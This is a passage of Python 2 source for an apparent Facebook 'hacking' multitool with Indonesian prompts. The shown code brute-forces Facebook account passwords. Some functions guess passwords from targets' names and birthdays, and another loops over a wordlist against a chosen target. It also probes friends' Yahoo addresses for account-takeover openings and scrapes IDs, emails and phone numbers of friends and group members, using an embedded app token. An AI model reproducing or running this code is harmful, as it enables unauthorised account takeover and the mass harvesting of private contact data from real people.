data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Kembali'
print
yahoo_pilih()
def yahoo_pilih():
go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(teman.text)
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Ambil ID teman'
print '\x1b[1;37;40m2. Ambil ID teman dari teman'
print '\x1b[1;37;40m3. Ambil ID member GRUP'
print '\x1b[1;37;40m4. Ambil Email teman'
print '\x1b[1;37;40m5. Ambil Email teman dari teman'
print '\x1b[1;37;40m6. Ambil No HP teman'
print '\x1b[1;37;40m7. Ambil No HP teman dari teman'
print '\x1b[1;31;40m0. Kembali'
print
grab_pilih()
def grab_pilih():
cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Jangan kosong'
grab_pilih()
else:
if cuih == '1':
id_teman()
else:
if cuih == '2':
idfrom_teman()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_teman()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_teman()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada'
grab_pilih()
def id_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def idfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
